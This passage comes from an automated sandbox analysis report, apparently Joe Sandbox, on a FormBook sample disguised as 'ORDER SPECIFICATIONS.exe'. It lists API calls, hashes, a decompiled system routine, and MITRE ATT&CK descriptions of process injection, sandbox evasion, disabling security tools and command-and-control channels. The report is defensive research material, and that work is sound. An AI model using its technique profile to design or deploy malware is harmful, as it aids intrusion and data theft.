Instruction Fuzzy Hash: 0D01A731A8432877E720A6949C43FFE77AC9B01B50F140555FF04BA1C2E6E4690646F5

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00BA9B82

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: b3f144870a4ac2d41ddbbde87d4b7058c87912e5cf5e4e4e69cd6570a84cfda7
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 4B010CB5D4020DBBDF10EAA4EC42FEEB3B89B54308F0081D5A90897241F671EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BB8584

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: f06cbc09afc3253f6f0996073a877e5ff5de0e781bf7f8148b136d2726cc72db
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C4015FB2214108ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB852D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BB8584

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: cd96e21e0c085a06ae1057f04bdd21c63dc947236c41aeba1365ba3f0d7f0a83
Instruction ID: b0d74f7ed28732f99f8395650bd6688cc93213a3e1c6d9d1f7c9d0966b3fb29f
Opcode Fuzzy Hash: cd96e21e0c085a06ae1057f04bdd21c63dc947236c41aeba1365ba3f0d7f0a83
Instruction Fuzzy Hash: 2901B2B2210108BFCB54DF99DD80EEB37ADAF8C354F158659BA1DA7251CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BACCC0,?,?), ref: 00BB703C

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: fe65ab874a2563ac24a70ac59c533f4e4b3b8f084bfcdc43e083e97e533947ab
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 5FE06D333806043BE2306599AC02FE7B2DCCB81B20F540066FA0DEA2C1D9D5F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6FF4, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BACCC0,?,?), ref: 00BB703C

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 26837a81c13137d2dd77480995cea5b9b34c7a703427f8ceabac79dcd4e21ecd
Instruction ID: 84607b945e0d07ff79ca9acfa0e9c9bb952b923911692a6255490829f0d0aec6
Opcode Fuzzy Hash: 26837a81c13137d2dd77480995cea5b9b34c7a703427f8ceabac79dcd4e21ecd
Instruction Fuzzy Hash: 98F0E53238170037D63026588C02FE77698CF85B50F640069F689AB2C1D5E5F94182A4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8618, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00BACF92,00BACF92,?,00000000,?,?), ref: 00BB8650

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 80ca3be4647d558fa54f379d8ed4b6cd9566c423fd4bb805fe3ef18ea22e5945
Instruction ID: 6db3044ecfafa96c63cb8a8ce3243687769b3f064965756e074fc6eec9c383b7
Opcode Fuzzy Hash: 80ca3be4647d558fa54f379d8ed4b6cd9566c423fd4bb805fe3ef18ea22e5945
Instruction Fuzzy Hash: 97E092B5600104ABDB20DF55CC81EEB3768EF84350F148559FA0CA7241CA31E800CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00BB3506,?,00BB3C7F,00BB3C7F,?,00BB3506,?,?,?,?,?,00000000,00000000,?), ref: 00BB84AD

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fab5df5e09a76d08e6ccf7170a42ba48ca9b523a082c310ddcf2cfb87db5e98c
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 4FE01AB1200204ABDB14DF59CC41EE777ACAF88650F114559BA085B241C930F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00BACF92,00BACF92,?,00000000,?,?), ref: 00BB8650

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 5c048b5452a3ff4ab61830a444c8e1f37641b1751f0c0cff7d90602459f6f7c5
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: EBE01AB12002086BDB10DF49CC85EEB37ADAF88650F018565BA0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD3F8, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00BA7C63,?), ref: 00BAD42B

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0f3bf8dc796ad52ad23224933228f976dfb371066717a5e8f5830793133f27b1
Instruction ID: eb6d3fd10bd856d1cdb9546f83b34910547c8092227a935d0f0992d01ddf23eb
Opcode Fuzzy Hash: 0f3bf8dc796ad52ad23224933228f976dfb371066717a5e8f5830793133f27b1
Instruction Fuzzy Hash: DCE0C2716903052BEA10AF94DC43F6273C9AB49B90F050069F988AB3C3DA60E50045A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00BA7C63,?), ref: 00BAD42B

Memory Dump Source

Source File: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: f53303a3326af11b28b67795757f4cfaede2fce396188b0dc96b76c6265e0f8d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 81D05E617903043BE610AAA49C03F6632C99B49B00F4940A4F949963C3D960F5004161

Uniqueness

Uniqueness Score: -1.00%

Function 0558967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05589694

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c941233c7620d65159066b88d01d976d4cd56007e98f353cc0d87bc2b0a3fb8
Instruction ID: 21c8e1ae09cbc0f2433cf176064cb1ee328587fea0b7c1324817f4b1e0bf7997
Opcode Fuzzy Hash: 1c941233c7620d65159066b88d01d976d4cd56007e98f353cc0d87bc2b0a3fb8
Instruction Fuzzy Hash: D0B092B29424C5CAEA15E7A14B08B3B7A61BBD0741F66C062E2021681A4B7CC491F6F6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 055DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E055DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0558CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E055D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E055D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x055dfdda
0x055dfde2
0x055dfde5
0x055dfdec
0x055dfdfa
0x055dfdff
0x055dfe0a
0x055dfe0f
0x055dfe17
0x055dfe1e
0x055dfe19
0x055dfe19
0x055dfe19
0x055dfe20
0x055dfe21
0x055dfe22
0x055dfe25
0x055dfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 055DFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 055DFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 055DFE01

Memory Dump Source

Source File: 00000010.00000002.499912263.0000000005520000.00000040.00000001.sdmp, Offset: 05520000, based on PE: true

Associated: 00000010.00000002.500268388.000000000563B000.00000040.00000001.sdmp Download File
Associated: 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 4f2a7260cebc5a6747753d4c984b9c67d6460f3b63cc8850abf0ee36ce1204a8
Instruction ID: bddbc2a42da5c89a2287ffdeebbdd51788642e554e3f91f5f3f1b540a3829661
Opcode Fuzzy Hash: 4f2a7260cebc5a6747753d4c984b9c67d6460f3b63cc8850abf0ee36ce1204a8
Instruction Fuzzy Hash: A3F0F637240601BFD7301A49DC06F23BB5AFB84770F244314F6285A1E1EA62F82096F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON